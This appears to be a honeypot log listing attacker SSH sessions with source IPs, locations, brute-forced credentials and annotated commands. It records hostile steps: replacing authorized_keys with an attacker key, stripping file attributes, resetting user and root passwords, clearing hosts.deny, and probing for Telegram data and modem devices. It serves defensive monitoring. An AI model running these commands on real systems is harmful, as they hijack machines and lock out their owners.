$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 ghost_root_20 (43.160.206.186) β€” Singapore, Singapore Β· 6 sessions Β· 116 cmds
2026-05-14 11:07 EDT Β· as old/sor123in, pakchoi/Kermit123@, root/@dmin123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo -e "sor123in\ns1CgsZn6muym\ns1CgsZn6muym"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "sor123in\ns1CgsZn6muym\ns1CgsZn6muym\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo -e "Kermit123@\nwOTuAcCKOZAN\nwOTuAcCKOZAN"|passwd|bash
$ echo "Kermit123@\nwOTuAcCKOZAN\nwOTuAcCKOZAN\n"|passwd
$ echo "root:89lF8ekMqouj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ echo "root:XPJ521ftCnga"|chpasswd|bash
$ echo "root:zSVpImQnUuAc"|chpasswd|bash
$ echo "root:kRF4XwUTfZK2"|chpasswd|bash
🎭 phantom_root_22 (103.61.123.132) β€” Thanh Liệt, Vietnam Β· 1 session Β· 20 cmds
2026-05-15 10:38 EDT Β· as old/sor123in
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "sor123in\ncG26tL13h3GW\ncG26tL13h3GW"|passwd|bash
$ Enter new UNIX password:
$ echo "sor123in\ncG26tL13h3GW\ncG26tL13h3GW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_45 (173.189.188.18) β€” Little Rock, United States Β· 1 session Β· 9 cmds
2026-05-15 05:50 EDT Β· as root/guest
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 k-pop_root_19 (183.110.116.65) β€” Seongnam-si, South Korea Β· 5 sessions Β· 10 cmds
2026-05-15 05:07 EDT Β· as dbus-helper/warnight, root/gilberto, root/rsyncd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 shadow_root_89 (103.187.146.196) β€” Jakarta, Indonesia Β· 5 sessions Β· 10 cmds
2026-05-15 05:09 EDT Β· as dbus-helper/warnight, root/gilberto, root/rsyncd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 star_root_46 (104.168.159.150) β€” Seattle, United States Β· 5 sessions Β· 10 cmds
2026-05-15 05:00 EDT Β· as dbus-helper/warnight, root/gilberto, root/rsyncd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 stroopwafel_sol_5 (89.190.156.21) β€” Amsterdam, Netherlands Β· 3 sessions Β· 6 cmds
2026-05-14 23:53 EDT Β· as dbus-helper/warnight, root/wsad, zhxnephu/zXXUKpvydMqzp1quBItn
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 specter_root_98 (103.177.177.237) β€” Tangerang, Indonesia Β· 1 session Β· 1 cmd
2026-05-14 21:58 EDT Β· as root/Some:Options:0312
echo
$ echo -n login_success
🎭 ghost_10 (45.117.179.232) β€” QuαΊ­n Mười, Vietnam Β· 1 session Β· 2 cmds
2026-05-14 20:39 EDT Β· as zhxnephu/zXXUKpvydMqzp1quBItn
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 burger_root_61 (172.191.239.155) β€” Boydton, United States Β· 1 session Β· 20 cmds
2026-05-14 20:33 EDT Β· as dbus-helper/warnight
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "warnight\nTVBz1XIAXBb0\nTVBz1XIAXBb0"|passwd|bash
$ Enter new UNIX password:
$ echo "warnight\nTVBz1XIAXBb0\nTVBz1XIAXBb0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_21 (54.38.157.20) β€” Limburg an der Lahn, Germany Β· 1 session Β· 20 cmds
2026-05-14 20:33 EDT Β· as zhxnephu/zXXUKpvydMqzp1quBItn
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "zXXUKpvydMqzp1quBItn\nzYFvfBhNprFx\nzYFvfBhNprFx"|passwd|bash
$ Enter new UNIX password:
$ echo "zXXUKpvydMqzp1quBItn\nzYFvfBhNprFx\nzYFvfBhNprFx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 clog_sol_3 (45.148.10.240) β€” Amsterdam, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-14 18:11 EDT Β· as admin/admin123, ubuntu/ubuntu
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m Γ—2 // obfuscated system check
🎭 bike_sol_5 (80.94.92.171) β€” Amsterdam, The Netherlands Β· 3 sessions Β· 3 cmds
2026-05-04 05:16 EDT Β· as sol/123, ubuntu/ubuntu
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m Γ—3 // obfuscated system check
🎭 wok_root_27 (120.48.90.166) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-14 17:20 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 specter_root_99 (125.227.213.74) β€” Chang-hua, Taiwan Β· 1 session Β· 1 cmd
2026-05-14 15:51 EDT Β· as ubuntu/ubuntu
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_100 (2.27.48.100) β€” Warsaw, Poland Β· 2 sessions Β· 40 cmds
2026-05-14 15:04 EDT Β· as bill/bill, pakchoi/Kermit123@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Kermit123@\nRFn83bknlSaO\nRFn83bknlSaO"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Kermit123@\nRFn83bknlSaO\nRFn83bknlSaO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "bill\nkG3K8jFI1Con\nkG3K8jFI1Con"|passwd|bash
$ echo "bill\nkG3K8jFI1Con\nkG3K8jFI1Con\n"|passwd
🎭 star_root_47 (67.102.183.113) β€” Los Angeles, United States Β· 2 sessions Β· 39 cmds
2026-05-14 14:29 EDT Β· as pakchoi/Kermit123@, root/no
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Kermit123@\ncXGXsNAfJCTr\ncXGXsNAfJCTr"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\ncXGXsNAfJCTr\ncXGXsNAfJCTr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:leLVZIcLIq2B"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 spice_root_3 (103.25.47.94) β€” Salem, India Β· 4 sessions Β· 60 cmds
2026-05-14 11:06 EDT Β· as pakchoi/Kermit123@, root/@dmin123456, root/booboo
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:MeM5xGiYMPaZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Kermit123@\nyfyEWYz6ePme\nyfyEWYz6ePme"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\nyfyEWYz6ePme\nyfyEWYz6ePme\n"|passwd
$ echo "root:VgvDRscuTrR5"|chpasswd|bash
🎭 ghost_root_113 (165.154.6.66) β€” Hong Kong, Hong Kong Β· 5 sessions Β· 96 cmds
2026-05-14 11:07 EDT Β· as pakchoi/Kermit123@, root/@dmin123456, root/booboo
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo "root:F7LGnoyWipyU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "Kermit123@\ntvgKeDq0WXrD\ntvgKeDq0WXrD"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\ntvgKeDq0WXrD\ntvgKeDq0WXrD\n"|passwd
$ echo "root:5nZ0luMuO32q"|chpasswd|bash
$ echo "root:GpPzWpoDu5HC"|chpasswd|bash
$ echo "root:kRF4XwUTfZK2"|chpasswd|bash
🎭 ghost_root_114 (196.188.93.169) β€” Addis Ababa, Ethiopia Β· 4 sessions Β· 76 cmds
2026-05-14 11:11 EDT Β· as root/@dmin123456, root/booboo, root/pepe1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:mFTbiNF5d7Zl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:pnOqLyBOOsgI"|chpasswd|bash
$ echo "root:FSRduYIWRrEa"|chpasswd|bash
